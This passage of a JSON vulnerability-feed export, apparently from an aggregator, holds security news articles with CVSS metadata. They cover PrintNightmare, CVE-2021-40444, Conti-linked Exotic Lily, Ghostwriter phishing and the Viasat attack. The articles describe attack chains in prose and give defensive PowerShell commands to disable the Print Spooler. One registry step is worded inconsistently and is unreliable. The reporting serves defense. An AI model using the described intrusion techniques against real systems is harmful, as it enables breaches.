"title": "Experts Expose Secrets of Conti Ransomware Group That Made 25 Million from Victims", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13374", "CVE-2018-13379", "CVE-2021-1675", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-11-20T15:13:21", "id": "THN:F35E41E26872B23A7F620C6D8F7E2334", "href": "https://thehackernews.com/2021/11/experts-expose-secrets-of-conti.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:27", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEi78Lgh1-a_Rlugh-jIjcQsT3okz4dkvUH1BpDGD2uThowKvsO7WgxJ7CzE9cAixe67YOA9inVSnZzZWhfA7bAV4ymALr-GCIvlvpRTka6rQROItUoRgAGIdaDtlEUPPeof7gjztGdh1UfjFIt_ps35SJsa5HNgqIppsi2kHJdv2NVQR31hMzFoIXUh>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have released a joint advisory warning that Russia-backed threat actors hacked the network of an unnamed non-governmental entity by exploiting a combination of flaws.\n\n\"As early as May 2021, Russian state-sponsored cyber actors took advantage of a misconfigured account set to default [multi-factor authentication] protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>).\n\n\"The actors then exploited a critical Windows Print Spooler vulnerability, 'PrintNightmare' ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>)) to run arbitrary code with system privileges.\"\n\nThe attack was pulled off by gaining initial access to the victim organization via compromised credentials \u2013 obtained by means of a brute-force password guessing attack \u2013 and enrolling a new device in the organization's [Duo MFA](<https://duo.com/product/multi-factor-authentication-mfa>).\n\nIt's also noteworthy that the breached account was un-enrolled from Duo due to a long period of inactivity, but had not yet been disabled in the NGO's Active Directory, thereby allowing the attackers to escalate their privileges using the PrintNightmare flaw and disable the MFA service altogether.\n\n\"As Duo's default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network,\" the agencies explained.\n\nTurning off MFA, in turn, allowed the state-sponsored actors to authenticate to the NGO's virtual private network (VPN) as non-administrator users, connect to Windows domain controllers via Remote Desktop Protocol (RDP), and obtain credentials for other domain accounts.\n\nIn the final stage of the attack, the newly compromised accounts were subsequently utilized to move laterally across the network to siphon data from the organization's cloud storage and email accounts.\n\nTo mitigate such attacks, both CISA and FBI are recommending organizations to enforce and review multi-factor authentication configuration policies, disable inactive accounts in Active Directory, and prioritize patching for [known exploited flaws](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T13:29:00", "type": "thn", "title": "FBI, CISA Warn of Russian Hackers Exploiting MFA and PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-16T13:29:45", "id": "THN:A52CF43B8B04C0A2F8413E17698F9308", "href": "https://thehackernews.com/2022/03/fbi-cisa-warn-of-russian-hackers.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-J4q0IawSomE/YOSMoHyRjgI/AAAAAAAABHE/cP0YFHHZFtA9uluA4FTtUF6qLpRtEeAEgCLcBGAsYHQ/s0/Microsoft-PrintSpooler-Vulnerability.jpg>)\n\nThis week, **PrintNightmare** \\- Microsoft's Print Spooler vulnerability (CVE-2021-34527) was upgraded from a 'Low' criticality to a 'Critical' criticality.\n\nThis is due to a Proof of Concept published on GitHub, which attackers could potentially leverage for gaining access to Domain Controllers.\n\nAs we [reported earlier](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>), Microsoft already released a patch in June 2021, but it wasn't enough to stop exploits. Attackers can still use Print Spooler when connecting remotely. You can find all you need to know about this vulnerability in this article and how you can mitigate it (and you can). \n\n**Print Spooler in a nutshell:** Print Spooler is Microsoft's service for managing and monitoring files printing. This service is among Microsoft's oldest and has had minimal maintenance updates since it was released. \n\nEvery Microsoft machine (servers and endpoints) has this feature enabled by default.\n\n**PrintNightmare vulnerability:** As soon as an attacker gains limited user access to a network, he will be able to connect (directly or remotely) to the Print Spooler. Since the Print Spooler has direct access to the kernel, the attacker can use it to gain access to the operating system, run remote code with system privileges, and ultimately attack the Domain Controller.\n\nYour best option when it comes to mitigating the PrintNightmare vulnerability is to disable the Print Spooler on every server and/or sensitive workstation (such as administrators' workstations, direct internet-facing workstations, and non-printing workstations).\n\nThis is what Dvir Goren's, hardening expert and CTO at [CalCom Software Solutions](<https://www.calcomsoftware.com/?utm_source=HN>), suggests as your first move towards mitigation.\n\nFollow these steps to disable the Print Spooler service on Windows 10:\n\n 1. Open Start.\n 2. Search for PowerShell, right-click on it and select the Run as administrator.\n 3. Type the command and press Enter: _Stop-Service -Name Spooler -Force_\n 4. Use this command to prevent the service from starting back up again during restart: Set-Service -Name Spooler -StartupType Disabled\n\nAccording to Dvir's experience, 90% of servers do not require Print Spooler. It is the default configuration for most of them, so it is usually enabled. As a result, disabling it can solve 90% of your problem and have little impact on production.\n\nIn large and complex infrastructures, it can be challenging to locate where Print Spooler is used.\n\nHere are a few examples where Print Spooler is required:\n\n 1. When using Citrix services,\n 2. Fax servers,\n 3. Any application requiring virtual or physical printing of PDFs, XPSs, etc. Billing services and wage applications, for example.\n\nHere are a few examples when Print Spooler is not needed but enabled by default:\n\n 1. Domain Controller and Active Directory \u2013 the main risk in this vulnerability can be neutralized by practicing basic cyber hygiene. It makes no sense to have Print Spooler enabled in DCs and AD servers. \n 2. Member servers such as SQL, File System, and Exchange servers. \n 3. Machines that do not require printing. \n\nA few other hardening steps suggested by Dvir for machines dependent on Print Spooler include:\n\n 1. Replace the vulnerable Print Spooler protocol with a non-Microsoft service. \n 2. By changing 'Allow Print Spooler to accept client connections', you can restrict users' and drivers' access to the Print Spooler to groups that must use it.\n 3. Disable Print Spooler caller in Pre-Windows 2000 compatibility group.\n 4. Make sure that Point and Print is not configured to No Warning \u2013 check registry key SOFTWARE/Policies/Microsoft/Windows NT/Printers/PointAndPrint/NoElevationOnInstall for DWORD value 1 and change it to 0.\n 5. Turn off EnableLUA \u2013 check registry key SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System/EnableLUA for DWORD value 0 and change it to 1.\n\nHere's what you need to do next to ensure your organization is secure:\n\n 1. Identify where Print Spooler is being used on your network. \n 2. Map your network to find the machines that must use Print Spooler.\n 3. Disable Print Spooler on machines that do not use it. \n 4. For machines that require Print Spooler \u2013 configure them in a way to minimize its attack surface. \n\nBeside this, to find potential evidence of exploitation, you should also monitor Microsoft-Windows-PrintService/Admin log entries. There might be entries with error messages that indicate Print Spooler can't load plug-in module DLLs, although this can also happen if an attacker packaged a legitimate DLL that Print Spooler demands.\n\nThe final recommendation from Dvir is to implement these recommendations through[ hardening automation tools](<https://www.calcomsoftware.com/best-hardening-tools/?utm_source=HN>). Without automation, you will spend countless hours attempting to harden manually and may end up vulnerable or causing systems to go down\n\nAfter choosing your course of action, a [Hardening automation tool](<https://www.calcomsoftware.com/server-hardening-suite/?utm_source=HN>) will discover where Print Spooler is enabled, where they are actually used, and disable or reconfigure them automatically.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T09:32:00", "type": "thn", "title": "How to Mitigate Microsoft Print Spooler Vulnerability \u2013 PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T15:05:22", "id": "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "href": "https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T15:55:37", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhTDhGSCLFNoe2MDkuwd-dbu3bKqPHtCuuSNeeosLJmQdiXnE3Hq_M2wsCJ9OqEk2ig0Jn0ITJ4RW9LkqUzEeWCBF6R1H6SS_wGXq_pLI3Y38VenthyRa2AlQQkCDlvzat6a-UDOxxvG3p-0r9ppLP1GKrMXdqPUW28Q6TZDz8v57TTuwc6KS6gi8pJ>)\n\nGoogle's Threat Analysis Group (TAG) took the wraps off a new [initial access broker](<https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html>) that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations.\n\nDubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally.\n\n\"Initial access brokers are the opportunistic locksmiths of the security world, and it's a full-time job,\" TAG researchers Vlad Stolyarov and Benoit Sevens [said](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>). \"These groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\"\n\nExotic Lily, first spotted in September 2021, is said to have been involved in data exfiltration and deployment of the human-operated Conti and [Diavol](<https://thehackernews.com/2021/08/researchers-find-new-evidence-linking.html>) ransomware strains, both of which share overlaps with Wizard Spider, the Russian cyber criminal syndicate that's also known for operating [TrickBot](<https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html>), [BazarBackdoor](<https://thehackernews.com/2021/07/phony-call-centers-tricking-users-into.html>), and [Anchor](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>).\n\n\"Yes, this is a possibility, especially considering this is more sophisticated and targeted than a traditional spam campaign, but we don't know for sure as of now,\" Google TAG told The Hacker News when asked whether Exotic Lily could be another extension of the Wizard Spider group.\n\n\"In the [Conti leaks](<https://thehackernews.com/2022/03/conti-ransomware-gangs-internal-chats.html>), Conti members mention 'spammers' as someone who they work with (e.g., provide custom-built 'crypted' malware samples, etc.) through outsourcing. However, most of the 'spammers' don't seem to be present (or actively communicate) in the chat, hence leading to a conclusion they're operating as a separate entity.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiRLlObJVyztso8c0_EbePqlTPrjHuRu1-NWCjxiV47unTWyXRykIMkEo4lnhKEbWUZSP4zUPmn3jo-N6O4gz5CgskYHypFzEWSI4djVkBE6Gle_kwlb7Mp7tQN5cmk2BPWhrXILnSvxl38u2qgqfAntvF85WiXMyt0WIn_ikXRHLwk6apNoOd64qob>)\n\nThe threat actor's social engineering lures, sent from spoofed email accounts, have specifically singled out IT, cybersecurity, and healthcare sectors, although post November 2021, the attacks have grown to be more indiscriminate, targeting a wide variety of organizations and industries.\n\nBesides using fictitious companies and identities as a means to build trust with the targeted entities, Exotic Lily has leveraged legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver [BazarBackdoor payloads](<https://abnormalsecurity.com/blog/bazarloader-contact-form>) in a bid to evade detection mechanisms.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjD7gTpku0C6R-pc9VwoTyiLgYiON0B6dyOqyFgyXxeXOTvF5CYHGGGVF3SC9He4ccMof89UgDp1tK7Xuin_iXJUH3yaRAFHQbBlmFKaz-VMRRWlsJZkQMC2Nsov-UnJQdUe37HX901rV208dbe-xqakcZ50w5XWf02Ldv4BMHbCtI-It_dm8dsiLFc>)\n\nThe rogue personas often posed as employees of firms such as Amazon, complete with fraudulent social media profiles on LinkedIn that featured fake AI-generated profile pictures. The group is also said to have impersonated real company employees by lifting their personal data from social media and business databases like RocketReach and CrunchBase.\n\n\"At the final stage, the attacker would upload the payload to a public file-sharing service (TransferNow, TransferXL, WeTransfer or OneDrive) and then use a built-in email notification feature to share the file with the target, allowing the final email to originate from the email address of a legitimate file-sharing service and not the attacker's email, which presents additional detection challenges,\" the researchers said.\n\nAlso delivered using the MHTML exploit is a custom loader called Bumblebee that's orchestrated to gather and exfiltrate system information to a remote server, which responds back commands to execute shellcode and run next-stage executables, including Cobalt Strike.\n\nAn analysis of the Exotic Lily's communication activity indicates that the threat actors have a \"typical 9-to-5 job\" on weekdays and may be possibly working from a Central or an Eastern Europe time zone.\n\n\"Exotic Lily seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T07:31:00", "type": "thn", "title": "Google Uncovers 'Initial Access Broker' Working with Conti Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-21T13:32:08", "id": "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "href": "https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-KnvkhCvOrtg/YTgvMst2aSI/AAAAAAAADvs/ibzrIC7hu6wR3f2vrtI3U2rW7SVg6UbKQCLcBGAsYHQ/s0/microsoft-office-hack.jpg>)\n\nMicrosoft on Tuesday warned of an actively exploited zero-day flaw impacting Internet Explorer that's being used to hijack vulnerable Windows systems by leveraging weaponized Office documents.\n\nTracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\" the company [said](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>).\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" it added.\n\nThe Windows maker credited researchers from EXPMON and Mandiant for reporting the flaw, although the company did not disclose additional specifics about the nature of the attacks, the identity of the adversaries exploiting this zero-day, or their targets in light of real-world attacks.\n\nEXPMON, in a [tweet](<https://twitter.com/EXPMON_/status/1435309115883020296>), noted it found the vulnerability after detecting a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users, adding it passed on its findings to Microsoft on Sunday. \"The exploit uses logical flaws so the exploitation is perfectly reliable (&amp; dangerous),\" EXPMON researchers said.\n\nHowever, it's worth pointing out that the current attack can be suppressed if Microsoft Office is run with default configurations, wherein documents downloaded from the web are opened in [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) or [Application Guard for Office](<https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide>), which is designed to prevent untrusted files from accessing trusted resources in the compromised system.\n\nMicrosoft, upon completion of the investigation, is expected to either release a security update as part of its Patch Tuesday monthly release cycle or issue an out-of-band patch \"depending on customer needs.\" In the interim, the Windows maker is urging users and organizations to disable all ActiveX controls in Internet Explorer to mitigate any potential attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-08T03:37:00", "type": "thn", "title": "New 0-Day Attack Targeting Windows Users With Microsoft Office Documents", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T04:55:07", "id": "THN:D4E86BD8938D3B2E15104CA4922A51F8", "href": "https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-05T03:38:09", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjI291J10LW67nc2C0UITCwpnhtduhMMY8ndL7-O83eu0zDh2WUIKe9oQiLkdnGI3y197Sqw_347ZW1fDrAE20TW48AvjuRlbQs4jajAbPaCjJbtzYHF8r5WHSfDMS_3mNTO-vTSDdTv2WKNT9BNnzfC2vPEosQs6BTjTvxD329uaye72syjHXguduS/s728-e100/flag.jpg>)\n\nA Belarusian threat actor known as Ghostwriter (aka UNC1151) has been spotted leveraging the recently disclosed browser-in-the-browser (BitB) technique as part of their credential phishing campaigns exploiting the ongoing Russo-Ukrainian conflict.\n\nThe method, which [masquerades](<https://thehackernews.com/2022/03/new-browser-in-browser-bitb-attack.html>) as a legitimate domain by simulating a browser window within the browser, makes it possible to mount convincing social engineering campaigns.\n\n\"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites,\" Google's Threat Analysis Group (TAG) [said](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>) in a new report, using it to siphon credentials entered by unsuspected victims to a remote server.\n\nAmong other groups [using the war as a lure](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>) in phishing and malware campaigns to deceive targets into opening fraudulent emails or links include [Mustang Panda](<https://thehackernews.com/2022/03/chinese-mustang-panda-hackers-spotted.html>) and [Scarab](<https://thehackernews.com/2022/03/another-chinese-hacking-group-spotted.html>) as well as nation-state actors from Iran, North Korea, and Russia.\n\nAlso included in the list is Curious Gorge, a hacking crew that TAG has attributed to China's People's Liberation Army Strategic Support Force (PLASSF), which has orchestrated attacks against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.\n\nA third set of attacks observed over the past two-week period originated from a Russia-based hacking group known as COLDRIVER (aka Callisto). TAG said that the actor staged credential phishing campaigns targeting multiple U.S.-based NGOs and think tanks, the military of a Balkans country, and an unnamed Ukrainian defense contractor.\n\n\"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence,\" TAG researcher Billy Leonard said. \"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.\"\n\n### Viasat breaks down February 24 Attack\n\nThe disclosure comes as U.S.-based telecommunications firm Viasat spilled details of a \"multifaceted and deliberate\" cyber attack against its KA-SAT network on February 24, 2022, coinciding with Russia's military invasion of Ukraine.\n\nThe attack on the satellite broadband service disconnected tens of thousands of modems from the network, impacting several customers in Ukraine and across Europe and affecting the [operations of 5,800 wind turbines](<https://www.reuters.com/business/energy/satellite-outage-knocks-out-control-enercon-wind-turbines-2022-02-28/>) belonging to the German company Enercon in Central Europe.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBPeFDF2b99SCr6BVB_zZ-LCkJ_Z4VIMJJ2_hv0dUXzJcbyh_0y2xuG6Ih-wOEDAAPScYYXNZFPIRH4HldJI-VuJV3m-fvIGibDE8t_PLlac8yuJ61A4gBdKQp6TWVpKqVMIRJm7Yxt_9F3F0hbUWlh8rMT48xechHXRrjEbMDZ2TLWlcobJPrpxEq/s728-e100/phishing.jpg>)\n\n\"We believe the purpose of the attack was to interrupt service,\" the company [explained](<https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/>). \"There is no evidence that any end-user data was accessed or compromised, nor customer personal equipment (PCs, mobile devices, etc.) was improperly accessed, nor is there any evidence that the KA-SAT satellite itself or its supporting satellite ground infrastructure itself were directly involved, impaired or compromised.\"\n\nViasat linked the attack to a \"ground-based network intrusion\" that exploited a misconfiguration in a VPN appliance to gain remote access to the KA-SAT network and execute destructive commands on the modems that \"overwrote key data in flash memory,\" rendering them temporarily unable to access the network.\n\n### Russian dissidents targeted with Cobalt Strike\n\nThe relentless attacks are the latest in a long list of malicious cyber activities that have emerged in the wake of the continuing conflict in Eastern Europe, with government and commercial networks suffering from a string of disruptive [data wiper infections](<https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html>) in conjunction with a series of ongoing distributed denial-of-service (DDoS) attacks.\n\nThis has also taken the form of compromising legitimate WordPress sites to inject rogue JavaScript code with the goal of carrying out DDoS attacks against Ukrainian domains, according to [researchers](<https://twitter.com/malwrhunterteam/status/1508517334239043584>) from the MalwareHunterTeam.\n\nBut it's not just Ukraine. Malwarebytes Labs this week laid out specifics of a new spear-phishing campaign targeting Russian citizens and government entities in an attempt to deploy pernicious payloads on compromised systems.\n\n\"The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid,\" Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>). \"Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\"\n\nThe malware-laced RTF documents contain an exploit for the widely abused MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>)), leading to the execution of a JavaScript code that spawns a PowerShell command to download and execute a Cobalt Strike beacon retrieved from a remote server.\n\nAnother cluster of activity potentially relates to a Russian threat actor tracked as Carbon Spider (aka [FIN7](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>)), which has employed a similar maldocs-oriented attack vector that's engineered to drop a PowerShell-based backdoor capable of fetching and running a next-stage executable.\n\nMalwarebytes also said it has detected a \"significant uptick in malware families being used with the intent of stealing information or otherwise gaining access in Ukraine,\" including [Hacktool.LOIC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool%3AWin32%2FOylecann.A>), [Ainslot Worm](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Ainslot.A!reg>), FFDroider, [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>), [Remcos](<https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos>), and [Quasar RAT](<https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/>).\n\n\"While these families are all relatively common in the cybersecurity world, the fact that we witnessed spikes almost exactly when Russian troops crossed the Ukrainian border makes these developments interesting and unusual,\" Adam Kujawa, director of Malwarebytes Labs, said in a statement shared with The Hacker News.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-31T13:02:00", "type": "thn", "title": "Hackers Increasingly Using 'Browser-in-the-Browser' Technique in Ukraine Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-05T02:23:33", "id": "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "href": "https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-07-14T12:38:34", "description": "Last week we wrote about [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>), a vulnerability that was supposed to be patched but wasn&#x27;t. After June&#x27;s Patch Tuesday, researchers found that the patch did not work in every case, most notably on modern domain controllers. Yesterday, Microsoft issued a set of out-of-band patches that sets that aims to set that right by fixing the Windows Print Spooler Remote Code Execution vulnerability listed as 